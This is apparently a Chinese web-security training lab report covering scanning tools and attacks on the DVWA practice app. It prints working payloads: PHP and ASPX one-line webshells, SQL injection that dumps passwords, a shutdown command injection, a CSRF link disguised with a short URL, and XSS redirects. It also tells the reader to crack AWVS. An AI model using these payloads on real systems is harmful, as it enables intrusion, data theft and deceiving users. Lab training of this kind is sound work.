实训目的
深入理解网络无安全的思想。
了解局域网查看软件Lansee的使用方法。
了解端口扫描软件AdvancedPortScanner的使用方法。
了解Web后台扫描软件御剑的使用方法。
了解网站漏洞扫描工具AWVS的使用方法。
了解Webshell连接工具中国菜刀的使用方法。
掌握端口及漏洞扫描的基本知识,能够利用工具进行扫描工作。
掌握网站入侵的一般流程。
了解SQL注入的概念和基本原理。
了解XSS跨站的概念和基本原理。
了解上传漏洞的概念和基本原理。
掌握通过SQL注入进行攻击的基本方法。
掌握通过XSS跨站进行攻击的基本方法。
掌握通过上传漏洞进行攻击的基本方法。
实训任务1 网络探查与端口扫描
局域网探查工具LanSee
1、其他主机在局域网中共享一些文件。
2、运行网络查看工具LanSee.exe。
3、点击设置,输入要探查的ip地址段。
4、点击开始进行探查,观察探查结果。
端口扫描工具AdvancedPortScanner
1、打开AdvancedPortScanner软件,在主界面中选择Use range选项,填入准备扫描的网段或主机IP。
2、选择Options-Configuration命令,此时打开Options对话框,在这里可以设置扫描属性,包括扫描时延、线程优先级、线程数量、扫描IP/Port列表设置等选项。
3、设置完成后点击ok回到主界面,单机Scan按钮,经过一段时间的等待,将显示扫描结果。
实训任务2 Web扫描
网站后台扫描工具御剑
1、打开御剑后台扫描工具,输入要扫描的网站域名。
2、线程选择2-4个,点击开始扫描。
3、等待扫描结果。
网站漏洞扫描工具AWVS
1、安装AWVS软件并破解。
2、利用target finder功能扫描一个IP地址是否提供web服务,是否开启80、443等端口。
3、利用web scanner功能扫描一个网站(自己搭建的靶站),观察扫描结果(包括漏洞告警、网站结构、cookies等信息)
4、利用site crawler功能爬取网站的文件和目录
实训任务3 漏洞利用
网站后台绕过
1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。
2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。
3、输入一些特殊字符,如‘’/+-=等,点击登录,观察系统反馈。
4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。
5、进入网站后台管理界面。
篡改页面内容
1、在网站前台或后台中寻找能够提交信息的合适位置。
2、提交代码<script>alert("test")</script>,使用另外的主机访问此网站,观察效果。
3、提交代码(代码中的网址可更改):
<script>window.location.href="http://d.mytanwan.com"</script>,观察效果。
实训任务4 上传后门程序(木马)并控制目标主机
一句话木马的使用
1、新建文本文档,将文件后缀修改为aspx,书写内容如下:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
2、在系统中寻找文件上传点。
3、上传之前创建的aspx一句话木马文件。
4、设法获得上传文件在网站目录中的文件名称和路径。
5、利用中国菜刀工具连接一句话木马(密码为pass)。
6、获得目标服务器的操作权限并拿到数据库文件。
7、对数据库中的账号密码进行解密。
DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
实训任务5 密码登录绕过
1、打开Brute Force界面,测试登陆框是否存在注入,提交敏感字符测试程序是否报错。在登录界面上输入用户名admin’(使用敏感字符‘)。
2、仔细观察登录系统时地址栏中的sql语句,在用户名密码提交界面上通过注入逻辑语句使登录判断失效,进入受保护页面。admin' or 1=1 --'
实验任务6 命令注入
1、打开Command Injection界面,在该界面提供一个命令行执行环境,输入ip地址返回ping命令的结果。
2、window和linux系统都可以用&&在同一行执行多条命令,尝试注入附加命令使目标主机(延时)关机。&&shutdown -s -t 600 shutdown –a可取消关机计划
实验任务7 跨站请求伪造
csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。
1、打开CSRF界面,可在New password和Confirm new password处正常修改登录口令。
2、构造一个链接:
http://IP/DVWA/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change# (注意以密码修改的实际地址为准)
3、利用在线短链接生成器伪造该链接。
4、此时可诱骗其他用户点击该链接,通过伪造身份提交密码修改,直接跳转到修改密码成功的页面,成功把密码修改为123。
实验任务8 文件上传
1、建立一个PHP文件,内容为:<?php @eval($_POST['pass']);?>。
2、打开File Upload界面,将PHP一句话木马上传。
3、得到木马在服务器上的路径。
4、打开中国菜刀,把上传木马路径添加到工具上。
5、双击网址进入文件管理。(注:这里可以进行文件管理,数据库管理,虚拟终端或运行自写脚本)
实验任务5 SQL注入
1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。
2、输入1提交,将正常返回查询结果。
3、输入1’提交,将返回一个错误。
4、猜测使用的sql语句可能是:select First name and Surname from 表名 where id='输入的id'。
5、输入1' union select 1,database()#提交,得到数据库名称。
6、输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#,得到数据库中的表名。
7、输入1' union select 1,column_name from information_schema.columns where table_name='users'#,得到users表的列名。
8、输入1' union select 1,concat(user,password) from users#,得到users表的所有用户名和密码。
实验任务9跨站攻击
1、打开XSS(DOM)界面,点击Select按钮,修改地址栏中的default属性为<script>alert('XXX')</script>,回车后命令被执行。
2、打开XSS(Reflected)界面,点击Submit,修改地址栏中的name=<script>alert('XXX')</script>。
3、利用在线短链接生成器伪造该链接,将短链接发送给小伙伴,命令被执行。
4、打开XSS(Stored)界面,在message栏中填入
<script> window.location.href="http://d.mytanwan.com/h/26026.html"</script>,提交后内容被存入数据库,之后每次进入该页面命令都会被执行。
通过实训,可以很清楚的让我们了解到信息安全时代所面临的威胁,这次实训可以熟练使用扫描工具等搜索漏洞,进行攻击。